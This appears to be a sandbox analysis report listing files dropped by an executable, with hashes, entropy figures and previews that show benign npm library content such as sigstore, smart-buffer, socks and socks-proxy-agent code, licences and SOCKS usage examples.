              Size (bytes):1115
              Entropy (8bit):4.715247973116598
              Encrypted:false
              SSDEEP:
              MD5:9EEC60D71C303E75465D141D7698AB75
              SHA1:B4CA5B5559A5FB5371C5F693BC32237EE2DAF206
              SHA-256:770215C9A2D5A6A0BFD210494D953628708E9E070A50A710E031CBA7F9243565
              SHA-512:5351421E143424DBAF8F952D40FF0B3D9B993D89438BFDF6BDBEFCBBE624F236F7DCB39F576068158CDB1C5E8B198016DD840D3A2852026F28F03AE701EA8A06
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "sigstore",. "version": "2.1.0",. "description": "code-signing for npm packages",. "main": "dist/index.js",. "types": "dist/index.d.ts",. "scripts": {. "clean": "shx rm -rf dist *.tsbuildinfo",. "build": "tsc --build",. "test": "jest". },. "files": [. "dist",. "store". ],. "author": "bdehamer@github.com",. "license": "Apache-2.0",. "repository": {. "type": "git",. "url": "git+https://github.com/sigstore/sigstore-js.git". },. "bugs": {. "url": "https://github.com/sigstore/sigstore-js/issues". },. "homepage": "https://github.com/sigstore/sigstore-js/tree/main/packages/client#readme",. "publishConfig": {. "provenance": true. },. "devDependencies": {. "@sigstore/rekor-types": "^2.0.0",. "@sigstore/jest": "^0.0.0",. "@sigstore/mock": "^0.4.0",. "@tufjs/repo-mock": "^2.0.0",. "@types/make-fetch-happen": "^10.0.0". },. "dependencies": {. "@sigstore/bundle": "^2.1.0",. "@sigstore/protobuf-specs": "^0.2.1",. "@si
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1087
              Entropy (8bit):5.137950307359853
              Encrypted:false
              SSDEEP:
              MD5:5B37B090A43E81BD880398260C467866
              SHA1:ECD174D7FC2C9C30751176131F7326063B36C29F
              SHA-256:C46E2C333E1C9E6FCFD130CF91B8E54BF67B60FABBC04996F7E199B990353FF3
              SHA-512:83D0FE5D2AB402E720EC6A8AF0017037A65339F45B98FAC0A26D0797D38C1FC5457D57B4082C5A29CAD458FDD0230826B4512C1E6E7887B077BC37C28B4FE44A
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2013-2017 Josh Glazebrook..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, O
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):44500
              Entropy (8bit):4.520531708261652
              Encrypted:false
              SSDEEP:
              MD5:58110B85E2C957B18359B12410FB8833
              SHA1:A829400A5F95AB47A4A45EBE8E2CEA062DBD223C
              SHA-256:6A73858A0AA6F7AC078D8156187EF97A713E44D52AFCCF6679A0A032539BE0CC
              SHA-512:9598658047FCB4E49B75729963B16CC89ACB357898374C65E6B799D5AA0AE8590853CF0E27581CE989189785618E5598034D4685AABED0ED808DA296EA0EAA96
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.const utils_1 = require("./utils");.// The default Buffer size if one is not provided..const DEFAULT_SMARTBUFFER_SIZE = 4096;.// The default string encoding to use for reading/writing strings..const DEFAULT_SMARTBUFFER_ENCODING = 'utf8';.class SmartBuffer {. /**. * Creates a new SmartBuffer instance.. *. * @param options { SmartBufferOptions } The SmartBufferOptions to apply to this instance.. */. constructor(options) {. this.length = 0;. this._encoding = DEFAULT_SMARTBUFFER_ENCODING;. this._writeOffset = 0;. this._readOffset = 0;. if (SmartBuffer.isSmartBufferOptions(options)) {. // Checks for encoding. if (options.encoding) {. utils_1.checkEncoding(options.encoding);. this._encoding = options.encoding;. }. // Checks for initial size length. if (options.size) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4273
              Entropy (8bit):5.167112734331434
              Encrypted:false
              SSDEEP:
              MD5:694E19A8E768FCF6D41829940A58798F
              SHA1:6BE476ED504CBD33DA63B3DB302673CF04474021
              SHA-256:451B2E82D359F3D8782BE4830BD5D9DF895434ADBBBD911FBEB27E64FC59167D
              SHA-512:C6CE296CD612C588D512212C35C6EA5304F5F77F6ACF7219FF0B61F30CD363366D520BDFBBE713E9D8C1B1A6041AB05E38AECEB104A78C8E7EE97F3A19945D83
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.const buffer_1 = require("buffer");./**. * Error strings. */.const ERRORS = {. INVALID_ENCODING: 'Invalid encoding provided. Please specify a valid encoding the internal Node.js Buffer supports.',. INVALID_SMARTBUFFER_SIZE: 'Invalid size provided. Size must be a valid integer greater than zero.',. INVALID_SMARTBUFFER_BUFFER: 'Invalid Buffer provided in SmartBufferOptions.',. INVALID_SMARTBUFFER_OBJECT: 'Invalid SmartBufferOptions object supplied to SmartBuffer constructor or factory methods.',. INVALID_OFFSET: 'An invalid offset value was provided.',. INVALID_OFFSET_NON_NUMBER: 'An invalid offset value was provided. A numeric value is required.',. INVALID_LENGTH: 'An invalid length value was provided.',. INVALID_LENGTH_NON_NUMBER: 'An invalid length value was provived. A numeric value is required.',. INVALID_TARGET_OFFSET: 'Target offset is beyond the bounds of the internal SmartBuff
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1969
              Entropy (8bit):4.784203419276851
              Encrypted:false
              SSDEEP:
              MD5:F1CDE8617855022E11FF922F3F37FF3D
              SHA1:A9DB89BE9421029BD73BAF8199042A08253A0B59
              SHA-256:188644CDF467D6A768AD25ED3EE8EB845DC5CB29AADC4C88CA7C5CB5F631D66A
              SHA-512:7186F5A207299BDBBAF377CE75D7E2BD8080B14A38A926370E0DAF4CDEEADBB6843DDB612DD2EEE8223EFFE12BE9D904A21569F0C481B76545112340E396247E
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "smart-buffer",. "version": "4.2.0",. "description": "smart-buffer is a Buffer wrapper that adds automatic read & write offset tracking, string operations, data insertions, and more.",. "main": "build/smartbuffer.js",. "contributors": ["syvita"],. "homepage": "https://github.com/JoshGlazebrook/smart-buffer/",. "repository": {. "type": "git",. "url": "https://github.com/JoshGlazebrook/smart-buffer.git". },. "bugs": {. "url": "https://github.com/JoshGlazebrook/smart-buffer/issues". },. "keywords": [. "buffer",. "smart",. "packet",. "serialize",. "network",. "cursor",. "simple". ],. "engines": {. "node": ">= 6.0.0",. "npm": ">= 3.0.0". },. "author": "Josh Glazebrook",. "license": "MIT",. "readmeFilename": "README.md",. "devDependencies": {. "@types/chai": "4.1.7",. "@types/mocha": "5.2.7",. "@types/node": "^12.0.0",. "chai": "4.2.0",. "coveralls": "3.0.5",. "istanbul": "^0.4.5",. "mocha": "6.2.0",. "m
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text
              Category:dropped
              Size (bytes):7437
              Entropy (8bit):4.438534128398186
              Encrypted:false
              SSDEEP:
              MD5:5ADB471D3A87492ADF0EE87DFEC85E33
              SHA1:859709737D7877C776B7AE6FD925E49717D9C385
              SHA-256:D1C106B38D026F562E8D6D451E56F460B4598C3096363E877DCD67D72E4F25EA
              SHA-512:7232B62B8A6302E2BE17CFEE498EC7CFCAD8EC00BC68DDC1E0F399814157EFD8D5EA375A88363504C01C04E1B268A6CF05F8A0BFDF4DCAF5C6B84CD77CF85F76
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {. function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }. return new (P || (P = Promise))(function (resolve, reject) {. function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }. function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }. function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }. step((generator = generator.apply(thisArg, _arguments || [])).next());. });.};.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.SocksProxyAgent = void 0;.const socks_1 = require("socks");.const agent_base_1 = require("agent
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):4467
              Entropy (8bit):4.683793736928681
              Encrypted:false
              SSDEEP:
              MD5:53D45445ED105375521E6C18127B13CC
              SHA1:E942FB85A95E0C47E6330F2ABD707FFB4A1DA603
              SHA-256:4873B91B353E2DBE3966B2636AC594419765202D353A8C27583535CCBF83E275
              SHA-512:D1E65E74F9DC43B762F57C17B695C4A9EB2C1429BF1B6C632D62118B5511B7BE70B7E3A35E1154BDDBD58BA3CA7C5D82CA31C8DE977BAA69AA30B55E56F8A1FF
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "socks-proxy-agent",. "description": "A SOCKS proxy `http.Agent` implementation for HTTP and HTTPS",. "homepage": "https://github.com/TooTallNate/node-socks-proxy-agent#readme",. "version": "7.0.0",. "main": "dist/index.js",. "author": {. "email": "nathan@tootallnate.net",. "name": "Nathan Rajlich",. "url": "http://n8.io/". },. "contributors": [. {. "name": "Kiko Beats",. "email": "josefrancisco.verdu@gmail.com". },. {. "name": "Josh Glazebrook",. "email": "josh@joshglazebrook.com". },. {. "name": "talmobi",. "email": "talmobi@users.noreply.github.com". },. {. "name": "Indospace.io",. "email": "justin@indospace.io". },. {. "name": "Kilian von Pflugk",. "email": "github@jumoog.io". },. {. "name": "Kyle",. "email": "admin@hk1229.cn". },. {. "name": "Matheus Fernandes",. "email": "matheus.frndes@gmail.com". },. {. "name": "Ricky Miller",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1082
              Entropy (8bit):5.113978228831875
              Encrypted:false
              SSDEEP:
              MD5:742DC14598FB295B01DF682683C57709
              SHA1:DDC86900B60A427D5065CD608B79CA29CD07C2FB
              SHA-256:4F4F28866154C8D758241A64296E8790D45D7D912FF7B029930778C06D8F2A72
              SHA-512:F9A76846FD0C93C20B77C10F2460A9B652FB031DE7C9B9F1ED0BDD59CA61E928B36CB37A97A218B9806173063A035A0BAB0B085AC3AE2D585EDC20D88DCC3E30
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2013 Josh Glazebrook..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):35304
              Entropy (8bit):4.504138944597363
              Encrypted:false
              SSDEEP:
              MD5:B8A20E3A6637497E5F593970C4CCA194
              SHA1:EC03EA5CD2EBA904FA5BE954CE15D5DA68758584
              SHA-256:F03DDEBD58F12926C6D8D885FF99AF834397CDBE389AF7C9AA07C10911517D44
              SHA-512:D9B5BACB3EAFBF19BF331985C8D8736EF8EB56140A00479E850B65685531599BEB2A496102FBBB3553FCE841CF70BCAC0714E2B8B72A37B6A40D7EAB7B6E65B5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {. function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }. return new (P || (P = Promise))(function (resolve, reject) {. function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }. function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }. function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }. step((generator = generator.apply(thisArg, _arguments || [])).next());. });.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.SocksClientError = exports.SocksClient = void 0;.const events_1 = require("events");.const net = require("net");.const ip = require("ip");.const smart_buffer_1 = require("smart-buffer");.const constants_1 = require("../common/constant
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (338)
              Category:dropped
              Size (bytes):7443
              Entropy (8bit):5.178428426556356
              Encrypted:false
              SSDEEP:
              MD5:8A40929B54D6B415220AF435428C3E8D
              SHA1:CC49E53EE75BD2DAFAACF91137E426F9431F9F39
              SHA-256:DFF2FAB7745C01BA69A14031297C67BF11CCB18CD1D7FA00C09C5FB58538D77A
              SHA-512:6AABFDEFF98F09F8E65E68DE05525BE3E28D5DF082E4A8DE1AC832DC5E0C7D250B9A41C9653E88045CCCB6F7FA3604EE94489A997270635BB62A3A81CD1F9A73
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.SOCKS5_NO_ACCEPTABLE_AUTH = exports.SOCKS5_CUSTOM_AUTH_END = exports.SOCKS5_CUSTOM_AUTH_START = exports.SOCKS_INCOMING_PACKET_SIZES = exports.SocksClientState = exports.Socks5Response = exports.Socks5HostType = exports.Socks5Auth = exports.Socks4Response = exports.SocksCommand = exports.ERRORS = exports.DEFAULT_TIMEOUT = void 0;.const DEFAULT_TIMEOUT = 30000;.exports.DEFAULT_TIMEOUT = DEFAULT_TIMEOUT;.// prettier-ignore.const ERRORS = {. InvalidSocksCommand: 'An invalid SOCKS command was provided. Valid options are connect, bind, and associate.',. InvalidSocksCommandForOperation: 'An invalid SOCKS command was provided. Only a subset of commands are supported for this operation.',. InvalidSocksCommandChain: 'An invalid SOCKS command was provided. Chaining currently only supports the connect command.',. InvalidSocksClientOptionsDestination: 'An invalid destination host was provided.',. Inv
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5506
              Entropy (8bit):4.942079610443514
              Encrypted:false
              SSDEEP:
              MD5:7B9C9FA202AF7B63D419168617CE1C52
              SHA1:DD404E32A0CD20BCA05E36A944DCEA6243E75AD2
              SHA-256:73870B5FF3A6FF63AA49FC6780F9EEDC035DE61CE66E0DCB8A62BDF2CEB81C4D
              SHA-512:7D1C25D804CD753C8A73BD76F7FF4618DB6A46E1445C9EF05B6358CAF37CB1BE0DDB99E04F74CDACDC006CC0F13B5A374597E3EC27941AE1D3364564A3C06DC3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.validateSocksClientChainOptions = exports.validateSocksClientOptions = void 0;.const util_1 = require("./util");.const constants_1 = require("./constants");.const stream = require("stream");./**. * Validates the provided SocksClientOptions. * @param options { SocksClientOptions }. * @param acceptedCommands { string[] } A list of accepted SocksProxy commands.. */.function validateSocksClientOptions(options, acceptedCommands = ['connect', 'bind', 'associate']) {. // Check SOCKs command option.. if (!constants_1.SocksCommand[options.command]) {. throw new util_1.SocksClientError(constants_1.ERRORS.InvalidSocksCommand, options);. }. // Check SocksCommand for acceptable command.. if (acceptedCommands.indexOf(options.command) === -1) {. throw new util_1.SocksClientError(constants_1.ERRORS.InvalidSocksCommandForOperation, options);. }. // Check destination. if (!isValidSo
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1549
              Entropy (8bit):4.50462413051842
              Encrypted:false
              SSDEEP:
              MD5:AFE7E8A00055390F83F45CD44B1A6860
              SHA1:EAA796D87A4B4065815C925970D84060053A9B4C
              SHA-256:49FEB670A5499E20899D892740F80D1E3EF24DEB64888A21DCABF6FE7419B4E8
              SHA-512:4D13C4C52FFD11CDA2F400A3D8E2CF4549E3276063667E7F53921337587AAEE2D889999CF0C5D9A47AE12963C8310F571C6F152A30377D371A4F3CC2BAE77AD5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ReceiveBuffer = void 0;.class ReceiveBuffer {. constructor(size = 4096) {. this.buffer = Buffer.allocUnsafe(size);. this.offset = 0;. this.originalSize = size;. }. get length() {. return this.offset;. }. append(data) {. if (!Buffer.isBuffer(data)) {. throw new Error('Attempted to append a non-buffer instance to ReceiveBuffer.');. }. if (this.offset + data.length >= this.buffer.length) {. const tmp = this.buffer;. this.buffer = Buffer.allocUnsafe(Math.max(this.buffer.length + this.originalSize, this.buffer.length + data.length));. tmp.copy(this.buffer);. }. data.copy(this.buffer, this.offset);. return (this.offset += data.length);. }. peek(length) {. if (length > this.offset) {. throw new Error('Attempted to read beyond the bounds of the managed interna
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):698
              Entropy (8bit):4.882890896921701
              Encrypted:false
              SSDEEP:
              MD5:B77592741B85E743AD45C3756F17D88C
              SHA1:11C868756E32E800E99A07D09F9AAFAF270DEC4B
              SHA-256:917AA278ECF8A4EB0E90E448EAC98DD75EB9A4C985DE0D7A04E04407E8CAF8F6
              SHA-512:D71A5EA964EE9158E286E7E62A6727BED57714C947FBA353361DD7BEE7D3E120DF8D3B9179BEF5B5D6775D7A13BF415D1B4E8DF338B39CC1718BD29F18A40C9B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.shuffleArray = exports.SocksClientError = void 0;./**. * Error wrapper for SocksClient. */.class SocksClientError extends Error {. constructor(message, options) {. super(message);. this.options = options;. }.}.exports.SocksClientError = SocksClientError;./**. * Shuffles a given array.. * @param array The array to shuffle.. */.function shuffleArray(array) {. for (let i = array.length - 1; i > 0; i--) {. const j = Math.floor(Math.random() * (i + 1));. [array[i], array[j]] = [array[j], array[i]];. }.}.exports.shuffleArray = shuffleArray;.//# sourceMappingURL=util.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):846
              Entropy (8bit):5.009457390843344
              Encrypted:false
              SSDEEP:
              MD5:A9108E705F9E87A79F7AAC96D6EB174F
              SHA1:FA99F1564F37CEED84349C6A9D852A8431F70887
              SHA-256:C82822BFE17665A9DE990C99E1AEA5D94874BCBC072F95B42C617BAB3D097DF7
              SHA-512:52F34716F2B8895DF759B16F656A50CF93792A710CE594D8574BB9CE6F72804631B670E2A2CFCEDE3476624B98F293A3782B4960638F2C0F32BBE0A4B58A5433
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __exportStar = (this && this.__exportStar) || function(m, exports) {. for (var p in m) if (p !== "default" && !Object.prototype.hasOwnProperty.call(exports, p)) __createBinding(exports, m, p);.};.Object.defineProperty(exports, "__esModule", { value: true });.__exportStar(require("./client/socksclient"), exports);.//# sourceMappingURL=index.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):354
              Entropy (8bit):4.664524730427692
              Encrypted:false
              SSDEEP:
              MD5:41366DB689D638DED2BD79CEE471CC0A
              SHA1:CC78455522DABFA45D077AAA31BC8296EE10ABC9
              SHA-256:BB434D3247F08B691954F1414B172CB299765AB4C7F843E8204A539FF4E63EF9
              SHA-512:A97F58CCF3A200200AAF48A09DB96F27311FC305EC813CBF6502A53F192D59737E79E842DC91E5B0CD1BB0FA6CBE3CFD6A8339D9BBD9355ABAC6E81516B94CF7
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## TypeScript Examples..[Connect command](typescript/connectExample.md)..[Bind command](typescript/bindExample.md)..[Associate command](typescript/associateExample.md)..## JavaScript Examples..[Connect command](javascript/connectExample.md)..[Bind command](javascript/bindExample.md)..[Associate command](javascript/associateExample.md)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (381)
              Category:dropped
              Size (bytes):3274
              Entropy (8bit):4.895886147329999
              Encrypted:false
              SSDEEP:
              MD5:7E88D7025301C73EF87C6A9BE86974F1
              SHA1:E0B9BC2F6A4B5F653259E9EC2F2137B185A051C0
              SHA-256:975B87E1D48D33A33F146FF341AA25191E40D3529D4FA653FBCDFE2212EBA612
              SHA-512:B4A2BCC7E7DBC47A2FAF38C4B8742F34F59151D1CF4F0F5926048C8946D89C3FAD7AB032C39A88E415EF46DFCAEFAC94616D1E71860DD1BA31E1B13B3FD58752
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'associate' command..The associate command tells the SOCKS proxy server to establish a UDP relay. The server binds to a new UDP port and communicates the newly opened port back to the origin client. From here, any SOCKS UDP frame packets sent to this special UDP port on the Proxy server will be forwarded to the desired destination, and any responses will be forwarded back to the origin client (you)...This can be used for things such as DNS queries, and other UDP communicates...**Connection Steps**..1. Client -(associate)-> Proxy (Tells the proxy to create a UDP relay and bind on a new port).2. Client <-(port)- Proxy (Tells the origin client which port it opened and is accepting UDP frame packets on)..At this point the proxy is accepting UDP frames on the specified port...3. Client --(udp frame) -> Proxy -> Destination (The origin client sends a UDP frame to the proxy on the UDP port, and the proxy then forwards it to the destination specified in t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (375)
              Category:dropped
              Size (bytes):2772
              Entropy (8bit):4.758214387958074
              Encrypted:false
              SSDEEP:
              MD5:A4B19383ADA8D854F640C2E0129EEB2D
              SHA1:E61EFC6A3DEA97A8E9A6BCA686AB804A8CCCE0C4
              SHA-256:5ADB174E1EB0CBDD5406F14635337F34A7DA6DEEDF65C1CEA484A302B2562631
              SHA-512:18B79E46CB42E4DFABFB11B87C1859312927C9CAB3FDF769B0B486D601A5A7CD5A7F66F3A9C6ABA4B3292B8469498B3B941A1EC53DD39A213356D4A0866FBCCD
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'bind' command..The bind command tells the SOCKS proxy server to bind and listen on a new TCP port for an incoming connection. It communicates the newly opened port back to the origin client. Once a incoming connection is accepted by the SOCKS proxy server it then communicates the remote host that connected to the SOCKS proxy back through the same initial connection via the origin client...This can be used for things such as FTP clients which require incoming TCP connections, etc...**Connection Steps**..1. Client -(bind)-> Proxy (Tells the proxy to bind to a new port).2. Client <-(port)- Proxy (Tells the origin client which port it opened).3. Client2 --> Proxy (Other client connects to the proxy on this port).4. Client <--(client2's host info) (Proxy tells the origin client who connected to it).5. Original connection to the proxy is now a full TCP stream between client (you) and client2..6. Client <--> Proxy <--> Client2...## Usage..The
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (325)
              Category:dropped
              Size (bytes):7567
              Entropy (8bit):4.900328957128052
              Encrypted:false
              SSDEEP:
              MD5:B794A4A5AFEECF53967396D6F61B14E9
              SHA1:C0497600A28F26A615092D486359D1A024EEC639
              SHA-256:B426332B7DA73E8CEFAEE0D30F4B435E763B44B2AFFAEC7EDD167FC4B04279C7
              SHA-512:1E3B6942866F28AD06ECDB9C342D9441B1648E1A5290D66424F443F86888F0D9286E207CFDDB7C7AEB53CBAF0ED72EF00A8B955DBAA0C3B73937D696A06FFE47
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'connect' command..The connect command is the most common use-case for a SOCKS proxy. This establishes a direct connection to a destination host through a proxy server. The destination host only has knowledge of the proxy server connecting to it and does not know about the origin client (you)...**Origin Client (you) <-> Proxy Server <-> Destination Server**..In this example, we are connecting to a web server on port 80, and sending a very basic HTTP request to receive a response. It's worth noting that there are many socks-http-agents that can be used with the node http module (and libraries such as request.js) to make this easier. This HTTP request is used as a simple example...The 'connect' command can be used via the SocksClient.createConnection() factory function as well as by creating a SocksClient instance and using event handlers...### Using createConnection with async/await..Since SocksClient.createConnection returns a Promise, we can easi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text, with very long lines (381)
              Category:dropped
              Size (bytes):3337
              Entropy (8bit):4.892185417074582
              Encrypted:false
              SSDEEP:
              MD5:1698E881CBE37575C38706DC8528E1AB
              SHA1:28A1D0BCA3632E80DB36D16F97669ABBBEC928AE
              SHA-256:97460CC4FBBCD1AC80A28386FA29A6BA9EDAF828C010F3159694D9EC66CAECB5
              SHA-512:C917B668A9302005636969FCAF73A7A0C7D710992F1476D9AC38F8109C1A11185FE77FC5A1FF1E2A6D764F19D4981A1776A064A3AA8355529225412D161ECE49
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'associate' command..The associate command tells the SOCKS proxy server to establish a UDP relay. The server binds to a new UDP port and communicates the newly opened port back to the origin client. From here, any SOCKS UDP frame packets sent to this special UDP port on the Proxy server will be forwarded to the desired destination, and any responses will be forwarded back to the origin client (you)...This can be used for things such as DNS queries, and other UDP communicates...**Connection Steps**..1. Client -(associate)-> Proxy (Tells the proxy to create a UDP relay and bind on a new port).2. Client <-(port)- Proxy (Tells the origin client which port it opened and is accepting UDP frame packets on)..At this point the proxy is accepting UDP frames on the specified port...3. Client --(udp frame) -> Proxy -> Destination (The origin client sends a UDP frame to the proxy on the UDP port, and the proxy then forwards it to the destination specified in t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text, with very long lines (375)
              Category:dropped
              Size (bytes):2838
              Entropy (8bit):4.755919144004303
              Encrypted:false
              SSDEEP:
              MD5:8221EF1B3932922645A81D6EEBFBD3C2
              SHA1:194036E50C5591C32F190FB7FCC53C48C55F1B02
              SHA-256:6322BE1CC9217D2A83B95C9DAAEA4F3CC1058B2C44EDE17D2717B8C9A01816DC
              SHA-512:FCB97D7210DF3B428C89E5A7F23F69A0C8F2B96251CBECEC61B3CC10848D0DF17073F264CC808636BA0E5AFB667F415EA2B323F99F2988DD6F88610E279A5DF3
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'bind' command..The bind command tells the SOCKS proxy server to bind and listen on a new TCP port for an incoming connection. It communicates the newly opened port back to the origin client. Once a incoming connection is accepted by the SOCKS proxy server it then communicates the remote host that connected to the SOCKS proxy back through the same initial connection via the origin client...This can be used for things such as FTP clients which require incoming TCP connections, etc...**Connection Steps**..1. Client -(bind)-> Proxy (Tells the proxy to bind to a new port).2. Client <-(port)- Proxy (Tells the origin client which port it opened).3. Client2 --> Proxy (Other client connects to the proxy on this port).4. Client <--(client2's host info) (Proxy tells the origin client who connected to it).5. Original connection to the proxy is now a full TCP stream between client (you) and client2..6. Client <--> Proxy <--> Client2...## Usage..The
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text, with very long lines (325)
              Category:dropped
              Size (bytes):7738
              Entropy (8bit):4.900513131971473
              Encrypted:false
              SSDEEP:
              MD5:2CA3396577CA674F265E0A5DBC15C45B
              SHA1:30A5BA9035A230701B92DEED893CAB66231CD123
              SHA-256:436E5161A75D2734675818F560DC03082A6AFE8FD195A09120038A0C4F6290C0
              SHA-512:8575CFFED316FE133E03D5A03C0EF83E58BDFD5484634C55A295BA7ADD2FC290AD57DFD3028BB692E044CA8D2A44D27D56464FDAE34E14FF787EDF73192011AA
              Malicious:false
              Reputation:unknown
              Preview:# socks examples..## Example for SOCKS 'connect' command..The connect command is the most common use-case for a SOCKS proxy. This establishes a direct connection to a destination host through a proxy server. The destination host only has knowledge of the proxy server connecting to it and does not know about the origin client (you)...**Origin Client (you) <-> Proxy Server <-> Destination Server**..In this example, we are connecting to a web server on port 80, and sending a very basic HTTP request to receive a response. It's worth noting that there are many socks-http-agents that can be used with the node http module (and libraries such as request.js) to make this easier. This HTTP request is used as a simple example...The 'connect' command can be used via the SocksClient.createConnection() factory function as well as by creating a SocksClient instance and using event handlers...### Using createConnection with async/await..Since SocksClient.createConnection returns a Promise, we can easi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):129
              Entropy (8bit):4.981691776335012
              Encrypted:false
              SSDEEP:
              MD5:1AF48F5F58204E0B6620B8926EA82E20
              SHA1:9EBEFF20A3E42B4ABC9A680920FCAB9E1AD545D9
              SHA-256:A7AB0D44389BD05C9C918AAE8A573B13FAAFF412A6A652EE68D7C308D0E11FFD
